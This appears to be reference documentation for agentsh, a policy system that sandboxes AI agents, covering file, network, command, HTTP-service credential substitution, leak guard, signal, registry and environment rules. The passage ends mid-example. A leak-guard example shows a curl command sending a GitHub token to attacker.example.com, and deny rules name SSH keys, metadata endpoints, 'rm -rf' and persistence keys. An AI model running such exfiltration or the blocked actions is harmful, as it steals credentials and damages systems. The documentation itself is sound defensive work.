Policy Reference
Deterministic policy schema for controlling file, network, command, signal, registry, and package access at the execution layer.
Policy Model
Decisions
| Decision | Description |
|---|---|
| `allow` | Permit the operation |
| `deny` | Block the operation |
| `approve` | Require human approval |
| `redirect` | Swap to a different target |
| `audit` | Allow + log (explicit logging) |
| `soft_delete` | Quarantine with restore option |
Scopes
- File operations
- Commands
- Environment variables
- Network (DNS/connect)
- PTY/session settings
- Signals (Linux only for blocking)
- Registry (Windows only)
Evaluation
First matching rule wins. Rules live in a named policy; sessions choose a policy at creation time.
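The first-match contract can be sketched in a few lines. This is an illustrative Python model of the evaluation loop, not agentsh's implementation; note that Python's `fnmatch` lets `*` cross `/`, unlike the real glob engine:

```python
from fnmatch import fnmatch

# Hypothetical sketch of first-match evaluation; rule shape and field
# names are illustrative, not the actual agentsh data structures.
def evaluate(rules, path, operation, default="deny"):
    """Return the decision of the first rule whose path glob and
    operation list both match; otherwise fall back to the default."""
    for rule in rules:
        path_ok = any(fnmatch(path, pat) for pat in rule["paths"])
        op_ok = "*" in rule["operations"] or operation in rule["operations"]
        if path_ok and op_ok:
            return rule["decision"]  # first match wins; later rules ignored
    return default

rules = [
    {"paths": ["/workspace/**"], "operations": ["delete"], "decision": "approve"},
    {"paths": ["/workspace/**"], "operations": ["*"], "decision": "allow"},
]
```

Because the `approve` rule precedes the catch-all `allow`, a delete inside the workspace is held for approval even though the broader rule would have allowed it.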
File Rules

Control file system operations by path and operation type.

```yaml
file_rules:
  # Allow reading workspace
  - name: allow-workspace-read
    paths:
      - "/workspace"
      - "/workspace/**"
    operations: [read, open, stat, list, readlink]
    decision: allow

  # Require approval for deletes
  - name: approve-workspace-delete
    paths: ["/workspace/**"]
    operations: [delete, rmdir]
    decision: approve
    message: "Agent wants to delete: {{.Path}}"
    timeout: 5m

  # Block sensitive paths
  - name: deny-ssh-keys
    paths: ["/home/**/.ssh/**", "/root/.ssh/**"]
    operations: ["*"]
    decision: deny
```

Operations: `read`, `open`, `stat`, `list`, `readlink`, `write`, `create`, `mkdir`, `chmod`, `rename`, `delete`, `rmdir`, `*` (all)
Network Rules

Control network connections by domain, CIDR, or port.

```yaml
network_rules:
  # Allow package registries
  - name: allow-npm
    domains: ["registry.npmjs.org", "*.npmjs.org"]
    ports: [443, 80]
    decision: allow

  # Block private networks
  - name: block-private
    cidrs:
      - "10.0.0.0/8"
      - "172.16.0.0/12"
      - "192.168.0.0/16"
    decision: deny

  # Block cloud metadata
  - name: block-metadata
    cidrs: ["169.254.169.254/32"]
    decision: deny

  # Approve unknown HTTPS
  - name: approve-unknown
    ports: [443]
    decision: approve
    message: "Connect to {{.RemoteAddr}}:{{.RemotePort}}?"
```
HTTP Services

HTTP services let you give an agent fine-grained access to third-party APIs — GitHub, Stripe, Slack, Jira, and others — without ever exposing the real credential. Each entry under the `http_services:` key declares everything in one place: the upstream URL, path/method filtering rules, and credential substitution settings.

```yaml
http_services:
  - name: github
    upstream: https://api.github.com
    default: deny
    rules:
      - name: read-issues
        methods: [GET]
        paths: ["/repos/myorg/*/issues", "/repos/myorg/*/issues/*"]
        decision: allow
    secret:
      ref: vault://kv/github#token
      format: "ghp_{rand:36}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"
    scrub_response: true
```
The three pieces of each entry:

- Routing & filtering (`upstream`, `rules`, `default`) — the agent calls `/svc/<name>/...` on the local gateway; agentsh matches the path and method against the declared rules and forwards approved requests upstream.
- Credential substitution (`secret`, `inject`, `scrub_response`) — agentsh fetches the real credential from a secrets provider, generates a format-matched fake for the agent, and swaps fake → real on the wire.
- Leak guard (automatic) — if the agent sends a fake credential to any host other than the entry's upstream, the request is blocked.

An entry can use all three pieces together (the common case), or use only routing (for open APIs that don't need credentials) or only credentials (for services where the agent already knows the endpoint). An entry must declare at least one of `rules` or `secret`.
When to use `http_services` instead of `network_rules`. Use `http_services` when you want fine-grained control over which API paths and methods the agent may call, combined with credential substitution. Use `network_rules` for everything else: arbitrary outbound HTTP, non-HTTP protocols, or cases where you don't need path-level filtering or credential management.

What does not fit `http_services`:

- GraphQL APIs — Linear, GitHub v4, Hasura, Shopify, and other GraphQL endpoints expose all operations through a single `/graphql` path with the operation name in the request body. Path-based rules cannot distinguish operations. Use `network_rules` with a host allow-list for these.
- Anthropic and OpenAI completion APIs — these are already covered by the agentsh DLP proxy (a separate feature). Do not duplicate them as `http_services` entries.
Routing & Filtering

Each `http_services:` entry names a service, points it at an upstream URL, and declares path/method rules that control what the agent may access. The complete schema:

```yaml
http_services:
  - name: github                      # service identifier; agent calls /svc/github/...
    upstream: https://api.github.com  # upstream URL
    expose_as: GITHUB_API_URL         # optional env var name; derived from name if empty
    aliases:                          # optional extra hostnames for fail-closed checks
      - api.github.example.com
    allow_direct: false               # escape hatch; default false
    default: deny                     # allow | deny; default depends on context

    # Path/method filtering rules (optional)
    rules:
      - name: read-contents
        methods: [GET]                # empty list or "*" means any method
        paths: ["/repos/myorg/myrepo/contents/**"]
        decision: allow
      - name: read-write-issues
        methods: [GET, POST]
        paths: ["/repos/myorg/myrepo/issues", "/repos/myorg/myrepo/issues/*"]
        decision: allow

    # Credential substitution (optional)
    secret:
      ref: vault://kv/github#token    # secrets URI
      format: "ghp_{rand:36}"         # fake credential format
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"
    scrub_response: true              # replace real creds in responses with fakes
```
Service-level fields:

- `name` (string, required) — identifier used in the gateway URL `/svc/<name>/...` and in audit logs. Must be a valid URL path segment.
- `upstream` (string, required) — the upstream API URL. The path component of `upstream` is preserved on forwarded requests. Bare unbracketed IPv6 addresses are rejected by the URL canonicalizer; use the bracketed form: `https://[2001:db8::1]:443`.
- `expose_as` (string, optional) — environment variable name agentsh will set to the gateway URL inside the sandbox. If empty, derived from `name` (e.g., `github` → `GITHUB_API_URL`).
- `aliases` (list of strings, optional) — extra hostnames recognized as belonging to this service for fail-closed checks. Useful for upstream APIs with regional hostnames.
- `allow_direct` (bool, optional, default `false`) — escape hatch allowing the agent to bypass the gateway and call the upstream URL directly. Off by default.
- `default` (string, optional) — `allow` or `deny`. The decision used when no rule matches. Defaults to `deny` when `rules` are present; defaults to `allow` for credential-only entries (no rules, has secret).
- `rules` (list, optional) — an ordered list of path/method rules. First match wins.
- `secret` (object, optional) — credential source and fake format. See Credential Substitution.
- `inject` (object, optional) — how to inject the real credential on the wire. Requires `secret`.
- `scrub_response` (bool, optional) — scan response bodies for the real credential and replace it with the fake. Defaults based on whether `secret` is present.
Per-rule fields under `rules:`:

- `name` (string, required) — rule identifier shown in audit logs.
- `methods` (list of strings, optional) — HTTP methods this rule applies to. An empty list or `"*"` both mean "any method".
- `paths` (list of strings, required) — plural. List of glob patterns matched against the request path using gobwas/glob with `/` as the separator.
- `decision` (string, required) — one of `allow`, `deny`, `approve`, or `audit`.
- `message` (string, optional) — a plain-text message recorded in the audit log alongside the rule decision. Useful for documenting an unusual allow rule.
- `timeout` (duration, optional) — parsed but not yet enforced (see Known Limitations).
Rule matching

Each rule under `rules:` matches an incoming request by both its path and its method. agentsh evaluates rules in declaration order; the first rule whose path glob and method list both match wins. If no rule matches, the service's `default:` applies (which itself defaults to `deny`). This subsection covers the two parts users get wrong most often: how the path glob behaves, and how to order rules so the right one wins.
Path matching

Paths are gobwas/glob patterns with `/` as the separator. `*` matches any sequence of non-separator characters; `**` matches across separators; `?` matches a single character; `[abc]` matches a character class. Patterns match against the request path relative to the service's upstream — the gateway prefix `/svc/<name>` has already been stripped by the time the rule engine sees the path.
| Pattern | Matches | Does not match |
|---|---|---|
| `/users` | `/users` | `/users/123` |
| `/users/*` | `/users/123` | `/users/123/posts` |
| `/users/**` | `/users/123/posts` and `/users/123` | `/orgs` |
| `/repos/myorg/*/contents/**` | `/repos/myorg/myrepo/contents/src/file.go` | `/repos/myorg` |
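The separator-aware behavior in the table can be modeled with a small translation to regular expressions. This sketch only approximates gobwas/glob for the patterns shown here; it is not the actual engine:

```python
import re

# Illustrative translation of the path-glob semantics described above:
# `*` stops at `/`, `**` crosses it, `?` matches one non-separator char.
def glob_to_regex(pattern: str) -> re.Pattern:
    out, i = [], 0
    while i < len(pattern):
        if pattern.startswith("**", i):
            out.append(".*")      # ** matches across separators
            i += 2
        elif pattern[i] == "*":
            out.append("[^/]*")   # * matches within a single path segment
            i += 1
        elif pattern[i] == "?":
            out.append("[^/]")    # ? matches one character within a segment
            i += 1
        else:
            out.append(re.escape(pattern[i]))
            i += 1
    return re.compile("^" + "".join(out) + "$")

def matches(pattern: str, path: str) -> bool:
    return glob_to_regex(pattern).match(path) is not None
```

Running the table's `/users` rows through `matches` reproduces the results shown above.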
Method matching

The `methods:` field lists the HTTP methods the rule applies to, e.g., `methods: [GET, POST]`. Two shorthand forms also match any method: omitting the field entirely, and the literal value `methods: ["*"]`.
First-match semantics

When two rules could both match a request, the rule that appears first in the `rules:` list wins. Order rules from most specific to least specific. The classic mistake is to put a broad allow first and an exception deny second — the broad allow consumes the request and the deny is never reached. Always put the exception first:

```yaml
http_services:
  - name: github
    upstream: https://api.github.com
    default: deny
    rules:
      # Deny FIRST: a narrow exception inside an otherwise-allowed range
      - name: block-secrets-dir
        methods: [GET]
        paths: ["/repos/myorg/myrepo/contents/secrets/**"]
        decision: deny
        message: "Block read access to secrets directory"
      # Then the broad allow
      - name: allow-repo-reads
        methods: [GET]
        paths: ["/repos/myorg/myrepo/contents/**"]
        decision: allow
```

If you reversed the order, the broad `allow-repo-reads` would match a request to `/repos/myorg/myrepo/contents/secrets/db.env` and the narrower deny would never fire.
Decision values

The `decision:` field on each rule takes one of four values, only two of which are currently wired:

- `allow` — forward the request to `upstream` with credentials substituted (if applicable). The default for matched rules.
- `deny` — reject the request without forwarding. Returns an HTTP error to the agent.
- `approve` — parsed but not yet enforced. Reserved for a future interactive-approval flow.
- `audit` — parsed but not yet enforced. Reserved for a future audit-only mode.

Use `allow` and `deny` only. The other two values are accepted by the parser but have no runtime effect.
Credential Substitution

Credential substitution is declared directly on each `http_services:` entry via the `secret`, `inject`, and `scrub_response` fields. At session start, agentsh fetches the real credential, generates a format-matched fake, and exposes only the fake to the agent. On the wire, fake credentials are swapped for real ones transparently.
secret

The `secret` object tells agentsh where to find the real credential and how to generate its fake replacement:

- `secret.ref` (string, required) — a secrets URI identifying the real credential. Resolved at session start and cached for the session lifetime. Example: `vault://kv/github#token`.
- `secret.format` (string, required) — the format string for the fake credential. Must contain exactly one `{rand:N}` placeholder (see fake_format syntax below).
inject

The `inject` object controls how the real credential is placed on outbound requests. Requires `secret` to be set.

- `inject.header.name` (string, required when `inject` is set) — the HTTP header name, e.g., `Authorization`.
- `inject.header.template` (string, required when `inject` is set) — the header value template. Must contain the literal `{{secret}}`, which is replaced with the real credential at send time. Example: `"Bearer {{secret}}"`.
scrub_response

When `scrub_response: true`, the post-hook scans response bodies for the real credential and replaces it with the fake before returning to the agent. Use this for endpoints that echo the credential back (e.g., a "whoami" endpoint that returns the bearer token in JSON).
fake_format syntax

The `secret.format` string must contain exactly one `{rand:N}` placeholder, where `N` is the number of random base62 characters to generate. The placeholder may be preceded by a literal prefix (e.g., the upstream API's token prefix) but it must appear at the end of the string — no characters after it.

Constraints:

- `{rand:N}` is the only template token
- It must appear exactly once
- It must be at the end of the format string (no trailing characters after the closing `}`)
- `N` must be at least 24 (the constant `minFakeEntropy`; 24 base62 chars give ~143 bits of entropy)
- The total length of the generated fake (`len(prefix) + N`) must equal the length of the real credential at substitution time — otherwise the substitution fails with `ErrFakeLengthMismatch`

Base62 alphabet used: `A-Z a-z 0-9`.
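Taken together, the constraints can be modeled in a few lines. This is a hypothetical sketch — `generate_fake` and its error messages are illustrative stand-ins for agentsh's internal validation and `ErrFakeLengthMismatch`, not its actual code:

```python
import re
import secrets
import string

BASE62 = string.ascii_uppercase + string.ascii_lowercase + string.digits

def generate_fake(fmt: str, real_len: int) -> str:
    """Generate a fake credential from a format string, enforcing the
    fake_format constraints: one trailing {rand:N}, N >= 24, and a
    total length equal to the real credential's length."""
    m = re.fullmatch(r"(.*)\{rand:(\d+)\}", fmt)  # placeholder must end the string
    if not m or "{rand:" in m.group(1):
        raise ValueError("format needs exactly one trailing {rand:N}")
    prefix, n = m.group(1), int(m.group(2))
    if n < 24:
        raise ValueError("N must be at least 24 (minFakeEntropy)")
    if len(prefix) + n != real_len:
        raise ValueError("fake length mismatch")  # stands in for ErrFakeLengthMismatch
    return prefix + "".join(secrets.choice(BASE62) for _ in range(n))

# A classic GitHub PAT is 40 chars: "ghp_" plus 36 random characters.
fake = generate_fake("ghp_{rand:36}", real_len=40)
```

The 24-character floor corresponds to roughly 24 × log2(62) ≈ 143 bits of entropy, which is why shorter placeholders are rejected.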
Per-provider fake format suggestions
These suggestions match the real-credential prefixes used by each upstream API. Use them when wiring up a new service so the fake is indistinguishable from a real token at the format level. Adjust N upward if your upstream's tokens are longer.
| Upstream API | Real prefix | Suggested format |
|---|---|---|
| GitHub PAT (classic) | ghp_ | "ghp_{rand:36}" |
| GitHub PAT (fine-grained) | github_pat_ | "github_pat_{rand:72}" |
| Stripe (secret key) | sk_live_ / sk_test_ | "sk_test_{rand:24}" |
| Slack bot token | xoxb- | "xoxb-{rand:48}" |
| Slack user token | xoxp- | "xoxp-{rand:48}" |
| Jira / Atlassian API token | (no prefix) | "{rand:24}" |
| PagerDuty | (no prefix) | "{rand:24}" |
| Datadog API key | (no prefix) | "{rand:32}" |
| SendGrid | SG. | "SG.{rand:66}" |
Note on Anthropic and OpenAI keys: These are handled by the agentsh DLP proxy, a separate feature. Do not declare an http_services entry for Anthropic or OpenAI completion endpoints.
Wire-level flow
When the agent sends a request through the gateway, agentsh processes it in five steps:

1. Route: The gateway receives the request at `/svc/<name>/...`, strips the prefix, and matches path + method against the declared rules. If the decision is `deny`, the request stops here.
2. Substitute: If the entry has a `secret`, the `CredsSubHook` pre-hook scans the request body, all header values, the URL query string, and the URL path for the fake credential and replaces each occurrence with the real one.
3. Inject: If `inject.header` is set, agentsh sets the header from the template (overwriting any value the agent supplied).
4. Forward: The request goes to the upstream URL with real credentials in place.
5. Scrub: When `scrub_response: true`, the post-hook scans the response body for the real credential and replaces it with the fake before returning to the agent.
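At their core, the substitute and scrub steps are string replacement over every surface the credential could appear on. A minimal sketch with illustrative names (the real pipeline is agentsh's hook chain, not this code):

```python
from dataclasses import dataclass, field

@dataclass
class Request:
    """Toy request model covering the surfaces the hooks scan."""
    path: str = ""
    query: str = ""
    headers: dict = field(default_factory=dict)
    body: str = ""

def substitute(req: Request, fake: str, real: str) -> Request:
    """Step 2: swap fake -> real everywhere the agent could place it."""
    req.path = req.path.replace(fake, real)
    req.query = req.query.replace(fake, real)
    req.headers = {k: v.replace(fake, real) for k, v in req.headers.items()}
    req.body = req.body.replace(fake, real)
    return req

def scrub(response_body: str, fake: str, real: str) -> str:
    """Step 5: swap real -> fake before the response reaches the agent."""
    return response_body.replace(real, fake)

fake_tok, real_tok = "ghp_FAKEFAKEFAKE", "ghp_REALREALREAL"
req = substitute(Request(headers={"Authorization": f"Bearer {fake_tok}"}),
                 fake_tok, real_tok)
```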
Leak Guard
The leak guard is the third hook in the credential pipeline (after the substitution and header-injection hooks). It enforces that fake credentials never leave agentsh through any path other than the legitimate substitution flow. If the agent grabs a fake credential from its environment and tries to send it to a host that does not own that credential — an attacker-controlled endpoint, a logging service, a webhook, or even a different declared service — the leak guard intercepts and denies the request with HTTP 403.
Without the leak guard, an agent that learned its environment contained a credential could exfiltrate the fake to an attacker. The attacker would then try to use the fake against the upstream API and fail (because the fake doesn't authenticate), but they would have learned the agent's identity, the format of the credential, and potentially used the leak as a side-channel for other data.
What the leak guard inspects
For every outbound HTTPS request that the proxy sees, the `LeakGuardHook` scans:

- The request body
- Every request header value (including `Authorization`, custom headers, cookies)
- The URL query string
- The URL path (both decoded and raw forms)

It looks for any fake credential in agentsh's per-session table.
The cross-service rule
The check is cross-service, not blanket. A fake credential discovered on a request to its own service is fine — that's the legitimate substitution path, and the substitution hook will swap the fake for the real one before forwarding. The leak guard only blocks when a fake belongs to service A and the request is destined for service B (or to no declared service at all). Concretely:
| Fake credential of service | Destination host | Outcome |
|---|---|---|
| github | api.github.com | Allowed — substituted by CredsSubHook |
| github | api.stripe.com | Blocked — fake of one service on another |
| github | attacker.example.com | Blocked — fake on an undeclared host |
| (none) | any | Not checked — nothing to leak |
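The table's decision logic reduces to one comparison per fake credential: does the destination host own the fake found on the request? An illustrative sketch (data shapes and names are hypothetical, not agentsh internals):

```python
# Sketch of the cross-service leak check described in the table above.
def leak_guard(request_host: str, request_text: str, fakes: dict) -> str:
    """fakes maps a fake credential -> (service_name, upstream_host).
    Block when a fake appears on a request bound for any host other than
    its own service's upstream; otherwise let the request continue."""
    for fake, (service, upstream_host) in fakes.items():
        if fake in request_text and request_host != upstream_host:
            return "blocked"   # surfaced to the agent as a generic HTTP 403
    return "allowed"

fakes = {"ghp_FAKE123": ("github", "api.github.com")}
```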
What the agent sees on a leak attempt
The denial returns HTTP 403 "credential leak blocked". The agent sees a normal-looking 403 from its outbound HTTP client — deliberately the same shape as a network policy denial, so the agent cannot infer "you tried to leak GitHub credentials" as a side-channel signal.
On the agentsh side, the event is logged via `slog.Warn` as `secret_leak_blocked` with structured fields `session_id`, `request_id`, `service_name` (the service the leaked fake belongs to), and `request_host`. This is a structured log line, not a typed audit event (see Known Limitations).
Coverage
The leak guard runs inside the same TLS-terminating proxy that handles substitution, so it inspects HTTPS traffic and plain HTTP traffic equally. Non-HTTP protocols and direct socket I/O are not inspected by the leak guard — those are governed by the broader network rules. If you allow raw outbound TCP to a host, the leak guard cannot scan it.
Examples
GitHub — scoped repo access with Vault-sourced credentials

This is the most common pattern: routing + filtering + credential substitution in a single entry.
```yaml
providers:
  vault:
    type: vault
    address: https://vault.corp.internal:8200
    auth:
      method: kubernetes
      kube_role: agentsh-prod

http_services:
  - name: github
    upstream: https://api.github.com
    expose_as: GITHUB_API_URL
    default: deny
    rules:
      - name: read-repo-contents
        methods: [GET]
        paths: ["/repos/myorg/myrepo/contents/**"]
        decision: allow
      - name: read-create-issues
        methods: [GET, POST]
        paths: ["/repos/myorg/myrepo/issues"]
        decision: allow
      - name: read-update-single-issue
        methods: [GET, PATCH]
        paths: ["/repos/myorg/myrepo/issues/*"]
        decision: allow
    secret:
      ref: vault://kv/github#token
      format: "ghp_{rand:36}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"
    scrub_response: true
```
At session start, agentsh:

- Generates a fake token like `ghp_aB3xZk9...` (36 random base62 chars after the `ghp_` prefix)
- Sets `GITHUB_API_URL` in the sub-process env to the local gateway URL
- Resolves `vault://kv/github#token` and caches the real token in memory
The agent calls:

```shell
curl -H "Authorization: Bearer $GITHUB_TOKEN" \
  "$GITHUB_API_URL/repos/myorg/myrepo/issues"
```

agentsh matches `/repos/myorg/myrepo/issues` against `read-create-issues` (GET allowed), swaps the fake token for the real one, forwards to `https://api.github.com`, and scrubs the real credential from the response before returning it to the agent.
Stripe — payments API with method restrictions
```yaml
http_services:
  - name: stripe
    upstream: https://api.stripe.com
    default: deny
    rules:
      - name: read-customers
        methods: [GET]
        paths: ["/v1/customers", "/v1/customers/*"]
        decision: allow
      - name: create-payment-intent
        methods: [POST]
        paths: ["/v1/payment_intents"]
        decision: allow
      - name: block-refunds
        methods: [POST]
        paths: ["/v1/refunds"]
        decision: deny
    secret:
      ref: vault://kv/stripe#api_key
      format: "sk_test_{rand:24}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"
```
Slack — post messages only
```yaml
http_services:
  - name: slack
    upstream: https://slack.com/api
    default: deny
    rules:
      - name: post-message
        methods: [POST]
        paths: ["/chat.postMessage"]
        decision: allow
      - name: list-channels
        methods: [GET, POST]
        paths: ["/conversations.list"]
        decision: allow
    secret:
      ref: op://Engineering/slack-bot#credential
      format: "xoxb-{rand:48}"
    inject:
      header:
        name: Authorization
        template: "Bearer {{secret}}"
```
Jira — issue tracking with basic auth
```yaml
http_services:
  - name: jira
    upstream: https://mycompany.atlassian.net/rest/api/3
    default: deny
    rules:
      - name: read-issues
        methods: [GET]
        paths: ["/issue/*", "/search"]
        decision: allow
      - name: add-comment
        methods: [POST]
        paths: ["/issue/*/comment"]
        decision: allow
    secret:
      ref: vault://kv/jira#api_token
      format: "{rand:24}"
    inject:
      header:
        name: Authorization
        template: "Basic {{secret}}"
```
Filtering only — no credentials
For open APIs where you want path-level control without credential management:
```yaml
http_services:
  - name: crates-io
    upstream: https://crates.io/api/v1
    default: deny
    rules:
      - name: search-crates
        methods: [GET]
        paths: ["/crates", "/crates/*"]
        decision: allow
```
Credentials only — no path filtering
For services where the agent needs credentials but all API paths are allowed. When `rules` is omitted and `secret` is present, the default decision is `allow`:

```yaml
http_services:
  - name: datadog
    upstream: https://api.datadoghq.com
    secret:
      ref: aws-sm://prod/datadog#api_key
      format: "{rand:32}"
    inject:
      header:
        name: DD-API-KEY
        template: "{{secret}}"
```
Leak attempt
If the agent (or a prompt-injected sub-agent) tries to exfiltrate a credential:

```shell
# Inside the sandboxed shell
curl -X POST https://attacker.example.com/collect \
  -H "X-Stolen-Token: $GITHUB_TOKEN"
```

The leak guard recognizes the fake GitHub token in the `X-Stolen-Token` header, sees the destination is not `api.github.com`, and returns HTTP 403. The agent sees a generic 403 (deliberately uninformative). agentsh logs `secret_leak_blocked` with `service_name=github` and `request_host=attacker.example.com`.
Known Limitations

The following limitations are documented explicitly so users don't waste time searching for features that aren't there yet.
Configuration notes
- The routing field is `upstream:`, not `base_url:`.
- The old `services:` key has been removed. If your policy still uses a top-level `services:` key, agentsh will reject it with a migration error. Move `secret`, `inject`, and `scrub_response` fields into your `http_services:` entries.
- Bare IPv6 addresses in `upstream:` are rejected. The host parser (`canonicalizeHost`) requires IPv6 in bracketed form: `https://[2001:db8::1]:443`. A literal `https://2001:db8::1` without brackets is rejected at policy load.
- Wildcard HTTP methods are accepted. Both an empty `methods:` field and the literal `methods: ["*"]` mean "any method."
- Fake credential length must match. The total length of the generated fake (`len(prefix) + N` from `{rand:N}`) must equal the length of the real credential. A mismatch fails with `ErrFakeLengthMismatch`.
- An entry must have at least one of `rules` or `secret`. An entry with neither is rejected at policy load.
Parsed but not yet enforced
- `timeout:` on rules. The `timeout:` field is accepted by the policy parser but has no enforcement effect. Requests are not bounded by a per-rule timeout. In the meantime, use OS-level timeouts in your agent runtime.
- `decision: approve` and `decision: audit`. Both decision values are accepted by the parser but have no runtime effect. Reserved for a future interactive-approval flow and audit-only mode. Use only `allow` and `deny` in production policies.
Not yet observable
- No dedicated audit event types. There are no typed audit events for HTTP-services routing decisions, credential substitution, or secrets fetches. The leak guard emits a structured `secret_leak_blocked` warn-level `slog` line (with `session_id`, `request_id`, `service_name`, `request_host`), but this is a log record, not a typed event in the audit pipeline.
Workload patterns that don't fit
- GraphQL APIs. Linear, GitHub v4, Hasura, Shopify, and other GraphQL endpoints expose all operations through a single `/graphql` path. Path-based rules cannot distinguish operations. For these, use `network_rules` with a host allow-list.
- WebSocket and SSE endpoints. Long-lived bidirectional connections are not currently mediated by the `http_services` gateway. Use `network_rules`.
- Anthropic and OpenAI completion endpoints. These are handled by the agentsh DLP proxy. Do not duplicate them as `http_services` entries.
Command Rules

Pre-execution checks for commands. With execve interception enabled (Linux full mode), rules also apply to nested commands spawned by scripts.

```yaml
command_rules:
  # Safe commands
  - name: allow-safe
    commands: [ls, cat, grep, find, pwd, echo, git, node, python]
    decision: allow

  # Approve package installs
  - name: approve-install
    commands: [npm, pip, cargo]
    args_patterns: ["install*", "add*"]
    decision: approve
    message: "Install packages: {{.Args}}"

  # Block dangerous patterns
  - name: block-rm-rf
    commands: [rm]
    args_patterns: ["*-rf*", "*-fr*"]
    decision: deny

  # Block system commands
  - name: block-system
    commands: [shutdown, reboot, systemctl, mount, dd, kill]
    decision: deny
```
Signal Rules

Control which processes can send signals to which targets. Full blocking is available on Linux only; macOS and Windows provide audit only.

```yaml
signal_rules:
  # Allow signals to self and children
  - name: allow-self
    signals: ["@all"]
    target:
      type: self
    decision: allow

  # Redirect SIGKILL to graceful SIGTERM
  - name: graceful-kill
    signals: ["SIGKILL"]
    target:
      type: children
    decision: redirect
    redirect_to: SIGTERM

  # Block fatal signals to external processes
  - name: deny-external-fatal
    signals: ["@fatal"]
    target:
      type: external
    decision: deny

  # Silently absorb job control signals from external sources
  - name: absorb-external-job
    signals: ["@job"]
    target:
      type: external
    decision: absorb
```
Signal groups:

- `@all` — All signals (1-31)
- `@fatal` — SIGKILL, SIGTERM, SIGQUIT, SIGABRT
- `@job` — SIGSTOP, SIGCONT, SIGTSTP, SIGTTIN, SIGTTOU
- `@reload` — SIGHUP, SIGUSR1, SIGUSR2

Target types: `self`, `children`, `descendants`, `session`, `external`, `system`

Signal decisions: `allow`, `deny`, `audit`, `approve`, `redirect` (to another signal), `absorb` (discard silently)
Registry Rules (Windows)

Control Windows registry access. Requires the minifilter driver.

```yaml
registry_rules:
  # Block persistence locations
  - name: block-run-keys
    paths:
      - 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*'
      - 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*'
    operations: [write, create, delete]
    decision: deny

  # Block security settings
  - name: block-defender
    paths: ['HKLM\SOFTWARE\Policies\Microsoft\Windows Defender*']
    operations: [write, create, delete]
    decision: deny

  # Allow reads everywhere
  - name: allow-read
    paths: ["*"]
    operations: [read]
    decision: allow
```
Resource Limits

Constrain resource usage per session. Full enforcement on Linux only.

```yaml
resource_limits:
  # Memory
  max_memory_mb: 2048
  memory_swap_max_mb: 0

  # CPU
  cpu_quota_percent: 80

  # Disk I/O
  disk_read_bps_max: 104857600   # 100 MB/s
  disk_write_bps_max: 52428800   # 50 MB/s

  # Network
  net_bandwidth_mbps: 100

  # Process limits
  pids_max: 100

  # Time limits
  command_timeout: 5m
  session_timeout: 4h
  idle_timeout: 30m
```
MCP Rules

The `mcp_rules` section in a policy file defines MCP security enforcement. This is the policy-file equivalent of the `sandbox.mcp` runtime configuration.

```yaml
mcp_rules:
  enforce_policy: true

  # Server-level access control
  server_policy: "allowlist"
  allowed_servers:
    - id: "trusted_*"
  denied_servers:
    - id: "untrusted_*"

  # Tool-level access control
  tool_policy: "allowlist"
  allowed_tools:
    - server: "database"
      tool: "query_users"
      content_hash: "sha256:abc123..."
    - server: "notes"
      tool: "read_*"
  denied_tools:
    - server: "*"
      tool: "exec_*"

  # Version pinning
  version_pinning:
    enabled: true
    on_change: "block"
    auto_trust_first: true

  # Cross-server attack detection
  cross_server:
    enabled: true
    read_then_send:
      enabled: true
    burst:
      enabled: true
```
See the MCP Policy Configuration section for detailed descriptions of each option.
Environment Policy

Control which environment variables processes can access.

- Defaults: With no `env_allow`, agentsh builds a minimal env (`PATH`/`LANG`/`TERM`/`HOME`) and strips built-in secret keys
- Overrides: Per-command `env_allow`/`env_deny` plus limits
- Block iteration: `env_block_iteration: true` hides env enumeration
Global policy (applies to all commands)

```yaml
env_policy:
  # Allowlist - only these vars are visible (supports wildcards)
  allow:
    - "PATH"
    - "HOME"
    - "LANG"
    - "TERM"
    - "NODE_*"   # All NODE_ prefixed vars
    - "npm_*"

  # Denylist - these are always stripped (even if in allow)
  deny:
    - "AWS_*"
    - "GITHUB_TOKEN"
    - "*_SECRET*"
    - "*_KEY"
    - "*_PASSWORD"

  # Size limits
  max_bytes: 1000000  # Max total env size
  max_keys: 100       # Max number of variables

  # Block enumeration (env, printenv, /proc/*/environ)
  block_iteration: true
```
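The interaction between `allow` and `deny` — deny always wins, even for a variable the allowlist matches — can be sketched in a few lines. Illustrative only, not agentsh's implementation (Python's `fnmatch` stands in for the real wildcard engine):

```python
from fnmatch import fnmatch

def filter_env(env: dict, allow: list, deny: list) -> dict:
    """Keep a variable only if it matches the allowlist AND does not
    match the denylist; deny wins over allow."""
    def matched(name, patterns):
        return any(fnmatch(name, p) for p in patterns)
    return {
        k: v for k, v in env.items()
        if matched(k, allow) and not matched(k, deny)
    }

env = {
    "PATH": "/usr/bin",
    "NODE_ENV": "dev",
    "AWS_SECRET_ACCESS_KEY": "x",  # stripped: not allowed, and AWS_* denied
    "DB_PASSWORD": "y",            # stripped: *_PASSWORD denied
}
visible = filter_env(env, allow=["PATH", "NODE_*"], deny=["AWS_*", "*_PASSWORD"])
```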
Per-command overrides

Override the global policy for specific commands:

```yaml
command_rules:
  # npm needs registry tokens
  - name: npm-with-tokens
    commands: [npm]
    decision: allow
    env_allow:
      - "NPM_TOKEN"
      - "NODE_AUTH_TOKEN"
    env_deny:
      - "AWS_*"   # Still deny cloud creds

  # Build tools get more env access
  - name: build-tools
    commands: [make, cargo, go]
    decision: allow
    env_allow:
      - "CC"
      - "CXX"
      - "GOPATH"
      - "CARGO_*"
    env_max_bytes: 500000
    env_max_keys: 50

  # Prevent scripts from discovering env vars
  - name: untrusted-scripts
    commands: [python, node, ruby]
    args_patterns: [".*\\.sh$", ".*eval.*"]
    decision: allow
    env_block_iteration: true
```
Environment Injection

Inject operator-trusted environment variables into every command execution, regardless of the parent environment. Injected variables bypass `env_policy` filtering since they are configured by the operator.

Use cases

- Shell builtin hardening: Set `BASH_ENV` to disable bash builtins that bypass seccomp policy (like `kill`, `ulimit`)
- Runtime injection: Add variables for environments that strip Docker ENV (e.g., Blaxel)
- Operator defaults: Configure variables that should always be present
Global configuration

Set in your `config.yml` to apply to all executions:

```yaml
sandbox:
  env_inject:
    BASH_ENV: "/usr/lib/agentsh/bash_startup.sh"
    # Add custom variables as needed
    MY_CUSTOM_VAR: "value"
```
Policy-level configuration

Override or extend global settings in a policy file:

```yaml
version: 1
name: my-policy
env_inject:
